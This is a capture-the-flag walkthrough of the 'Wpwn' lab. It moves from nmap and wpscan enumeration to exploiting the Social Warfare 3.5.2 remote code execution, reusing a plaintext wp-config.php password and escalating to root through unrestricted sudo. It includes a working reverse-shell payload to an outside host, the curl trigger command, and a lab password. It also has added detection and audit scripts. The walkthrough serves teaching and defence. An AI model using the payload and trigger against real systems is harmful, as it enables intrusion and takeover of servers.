Wpwn - OSPG


Summary

The social-warfare plugin on the target system is vulnerable to unauthenticated remote code execution. After obtaining initial access, we compromise a local user via a plaintext credential found in the WordPress config file. Finally, privilege escalation is achieved through a misconfigured sudo permission.


Enumeration

Nmap

We’ll begin with an nmap scan.

$ nmap --open -sV -A -p- -vv -n -Pn -oN nmap/services.txt 192.168.162.123
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).

Let’s further investigate the HTTP service running on port 80.

Web Application

We use ffuf, a web directory brute-forcer, as below.

$ ffuf -u $URL -w /usr/share/seclists/Discovery/Web-Content/common.txt | tee ffuf/http.txt
index.html              [Status: 200, Size: 23, Words: 4, Lines: 4]
robots.txt              [Status: 200, Size: 57, Words: 10, Lines: 3]
server-status           [Status: 403, Size: 280, Words: 20, Lines: 10]
wordpress               [Status: 301, Size: 322, Words: 20, Lines: 10]
:: Progress: [4686/4686] :: Job [1/1] :: 156 req/sec :: Duration: [0:00:33] :: Errors: 0 ::

The wordpress directory appears interesting for additional enumeration.

WPScan

To enumerate WordPress effectively, we use a tool called wpscan.

Let’s see how we can use the tool to enumerate all users and available plugins of the WordPress site.

On the terminal, we run the following command:

$ wpscan --url http://192.168.162.123/wordpress/ -e u,ap -t 10
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_| 
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18 
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
...
[+] social-warfare
 | Location: http://192.168.162.123/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2021-07-20T16:09:00.000Z
 | [!] The version is out of date, the latest version is 4.3.0
 |                                    
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Comment (Passive Detection)          
 |
 | Version: 3.5.2 (100% confidence)
 | Found By: Comment (Passive Detection)
 |  - http://192.168.162.123/wordpress/, Match: 'Social Warfare v3.5.2'
 | Confirmed By:
 |  Query Parameter (Passive Detection)
 |   - http://192.168.162.123/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.2
 |   - http://192.168.162.123/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.2
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://192.168.162.123/wordpress/wp-content/plugins/social-warfare/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.162.123/wordpress/wp-content/plugins/social-warfare/readme.txt
...
[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.162.123/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection) 

Analyzing the output, we discover the social-warfare plugin at version 3.5.2 and the user admin.

Now we turn our attention to the plugin and check whether a public exploit exists for it with searchsploit.

$ searchsploit wordpress social warfare
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution                                                                                             | php/webapps/46794.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
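The searchsploit entry says versions below 3.5.3 are affected, and wpscan confirmed the installed version from the plugin's readme.txt "Stable tag" line. The following script is an added example for this write-up (not part of the original page or of the Social Warfare project): it reads a plugin readme.txt the way wpscan does, extracts the stable tag, and compares it against the fixed version. The readme text in SAMPLE_README is constructed; the fixed version 3.5.3 is taken from the searchsploit title above.

```python
"""Check a WordPress plugin's readme.txt stable tag against a fixed version.

Added example for this write-up (not the page's or the plugin's own code).
SAMPLE_README below is a constructed stand-in for
wp-content/plugins/social-warfare/readme.txt.
"""
import re

# Constructed sample of the readme header WordPress plugins ship.
SAMPLE_README = """\
=== Social Warfare ===
Contributors: holas84, webinator, dshanske
Requires at least: 4.5
Tested up to: 5.2
Stable tag: 3.5.2
License: GPLv2 or later
"""

STABLE_TAG_RE = re.compile(r"^Stable tag:\s*(\S+)", re.IGNORECASE | re.MULTILINE)


def stable_tag(readme_text):
    """Return the 'Stable tag' value from a plugin readme, or None if absent."""
    m = STABLE_TAG_RE.search(readme_text)
    return m.group(1) if m else None


def parse_version(version):
    """Turn '3.5.2' into (3, 5, 2); return None when no numeric parts exist
    (plugins sometimes publish 'Stable tag: trunk')."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version))
    return parts or None


def is_vulnerable(readme_text, fixed_in="3.5.3"):
    """True if the readme's stable tag is older than fixed_in, False if not,
    None if the version cannot be determined."""
    tag = stable_tag(readme_text)
    if tag is None:
        return None
    installed = parse_version(tag)
    if installed is None:
        return None
    return installed < parse_version(fixed_in)


if __name__ == "__main__":
    tag = stable_tag(SAMPLE_README)
    print(f"installed {tag}: vulnerable={is_vulnerable(SAMPLE_README)}")
```

Point the script at the readme.txt of every installed plugin (for example by reading each wp-content/plugins/*/readme.txt) to get the same "version is out of date" signal wpscan reports, without needing the scanner on the host.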

Exploitation

social-warfare → Unauthenticated RCE

There is a high chance that our target is vulnerable. To test this, we run the following commands.

[1]. Create a file called payload.txt containing a reverse shell.

Example content of payload.txt.

<pre>system('bash -c "bash -i >& /dev/tcp/192.168.49.162/53 0>&1"')</pre>

[2]. Start an HTTP server using python.

$ python3 -m http.server 80

[3]. Trigger the payload.

$ curl -s http://192.168.162.123/wordpress/wp-admin/admin-post.php\?swp_debug=load_options\&swp_url=http://192.168.49.162/payload.txt

After the final command is executed, our nc listener should catch the reverse shell as www-data.

$ nc -nlvp 53
listening on [any] 53 ...
connect to [192.168.49.162] from (UNKNOWN) [192.168.162.123] 51492
bash: cannot set terminal process group (514): Inappropriate ioctl for device
bash: no job control in this shell
www-data@wpwn:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
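The exploit above leaves a distinctive trace in the web server log: a request to admin-post.php with swp_debug=load_options and an swp_url that points at a host the site does not control. The script below is an added example for this write-up (not code from the original page): it parses Apache combined-format access log lines and flags such requests. The log lines in SAMPLE_LOG and the LOCAL_HOSTS set are constructed for the demonstration.

```python
"""Flag Social Warfare swp_debug/load_options abuse in Apache access logs.

Added example for this write-up (not part of the original page). It looks
for the request shape the exploit above produces: admin-post.php with
swp_debug=load_options and an swp_url pointing off-site. SAMPLE_LOG and
LOCAL_HOSTS are constructed for the demo.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Hostnames/IPs the site legitimately serves from (assumption for the demo).
LOCAL_HOSTS = {"192.168.162.123", "127.0.0.1", "localhost"}

# Apache combined log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def analyse_line(line):
    """Return a finding dict for one log line, or None if it is benign."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    target = urlsplit(m.group("target"))
    if not target.path.endswith("/admin-post.php"):
        return None
    params = parse_qs(target.query)
    if params.get("swp_debug", [None])[0] != "load_options":
        return None
    # Vulnerable versions fetch swp_url and eval() what sits inside <pre> tags,
    # so any off-site swp_url is a remote-include attempt, not a probe.
    remote = []
    for url in params.get("swp_url", []):
        host = urlsplit(url).hostname
        if host and host not in LOCAL_HOSTS:
            remote.append(url)
    return {
        "client": m.group("client"),
        "time": m.group("time"),
        "status": int(m.group("status")),
        "severity": "critical" if remote else "suspicious",
        "swp_url": remote[0] if remote else None,
    }


def scan(lines):
    """Run analyse_line over an iterable of log lines; return all findings."""
    return [f for f in map(analyse_line, lines) if f is not None]


# Constructed sample: two benign requests, one exploit attempt, one bare probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Jul/2021:10:00:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [20/Jul/2021:10:00:02 +0000] "POST /wordpress/wp-admin/admin-post.php?action=save HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.168.49.162 - - [20/Jul/2021:10:00:03 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.162/payload.txt HTTP/1.1" 200 0 "-" "curl/7.74.0"',
    '192.168.49.162 - - [20/Jul/2021:10:00:04 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options HTTP/1.1" 200 0 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A request with swp_debug=load_options but no swp_url is reported as "suspicious" rather than "critical", because it can be a scanner fingerprinting the endpoint; the off-site swp_url is the part that actually delivers code. Feeding the script `tail -f` output from the access log turns it into a simple live alert.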

Privilege Escalation

Plaintext Password

The wp-config.php file divulges the plaintext password of the WordPress database.

www-data@wpwn:/var/www/html/wordpress$ cat wp-config.php
<?php
...
define( 'DB_NAME', 'wordpress_db' );            
/** MySQL database username */
define( 'DB_USER', 'wp_user' );                       
/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );  

Trying to log in as the takis user with that password, we luckily secure a shell as takis.

Sudo Permission

From the takis shell, we can execute any command via sudo

takis@wpwn:~$ sudo -l
Matching Defaults entries for takis on wpwn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User takis may run the following commands on wpwn:
    (ALL) NOPASSWD: ALL

and can thus obtain root access without any further effort.

takis@wpwn:~$ sudo su
root@wpwn:/home/takis# id
uid=0(root) gid=0(root) groups=0(root)
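The `(ALL) NOPASSWD: ALL` line above is the whole privilege escalation. The script below is an added example for this write-up (not code from the original page): it parses the user-specification block that `sudo -l` prints, as shown above, and reports entries that grant any command as root or grant commands without a password, which is the check an auditor would run across hosts. Both listings in the block are constructed; the first mirrors the takis output, the second shows a restricted user for contrast.

```python
"""Audit `sudo -l` output for unrestricted or passwordless privileges.

Added example for this write-up (not part of the original page). The
parser reads the "User X may run the following commands on H:" block
that sudo -l prints; SAMPLE_OUTPUT and RESTRICTED_OUTPUT are constructed.
"""
import re

# One privilege line: "(runas[:group]) [TAG: ...] command[, command...]"
SPEC_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(text):
    """Return a list of (runas, tags, commands) from sudo -l output."""
    specs = []
    in_block = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_block = True
            continue
        if not in_block:
            continue
        m = SPEC_RE.match(line)
        if m:
            tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
            cmds = [c.strip() for c in m.group("cmds").split(",")]
            specs.append((m.group("runas"), tags, cmds))
    return specs


def findings(text):
    """Human-readable risk findings for one sudo -l listing."""
    out = []
    for runas, tags, cmds in parse_sudo_l(text):
        # "(ALL)" and "(ALL : ALL)" both allow running as root.
        as_root = runas.split(":")[0].strip() in ("ALL", "root")
        if "ALL" in cmds and as_root:
            msg = "can run ANY command as root"
            if "NOPASSWD" in tags:
                msg += " without a password"
            out.append(msg)
        elif "NOPASSWD" in tags:
            out.append("passwordless sudo for: " + ", ".join(cmds))
    return out


def is_unrestricted(text):
    """True when the listing is equivalent to unrestricted root."""
    return any(f.startswith("can run ANY command as root") for f in findings(text))


# Constructed listing matching the takis output above.
SAMPLE_OUTPUT = """\
Matching Defaults entries for takis on wpwn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User takis may run the following commands on wpwn:
    (ALL) NOPASSWD: ALL
"""

# Constructed listing for a user with a narrow, mostly password-protected grant.
RESTRICTED_OUTPUT = """\
User backup may run the following commands on wpwn:
    (root) /usr/bin/rsync
    (root) NOPASSWD: /usr/sbin/service apache2 restart
"""

if __name__ == "__main__":
    for name, listing in (("takis", SAMPLE_OUTPUT), ("backup", RESTRICTED_OUTPUT)):
        print(name, findings(listing) or ["no findings"])
```

Run it against `sudo -l -U <user>` output collected from each host (or pipe `sudo -l` into it) to find accounts whose sudo grant is effectively a second root password; a service account whose credential sits in plaintext in wp-config.php should never have one.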